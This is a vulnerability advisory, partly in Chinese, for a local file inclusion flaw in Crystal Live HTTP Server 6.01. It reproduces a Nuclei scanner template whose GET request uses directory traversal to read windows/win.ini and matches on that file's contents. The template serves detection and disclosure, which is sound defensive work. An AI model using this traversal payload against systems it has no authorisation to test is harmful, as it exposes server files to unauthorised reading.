crystal-live-server-lfi: Crystal Live HTTP Server 6.01 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Crystal Live HTTP Server 6.01 | POC: 已公开

漏洞描述

Crystal Live HTTP Server 6.01 is vulnerable to local file inclusion.

PoC代码[已公开]

id: crystal-live-server-lfi

info:
  name: Crystal Live HTTP Server 6.01 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Crystal Live HTTP Server 6.01 is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2019110127
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,crystal,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a00483046022100a26c8d8ffdea121157b7c42bfea1ab142e1353794ea510672770a2a6fdf78037022100fab4e2428b2da5cf93bbe25b6e7acce371402d3a42b135facce2e5601f7ee0de:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/crystal-live-server-lfi.yaml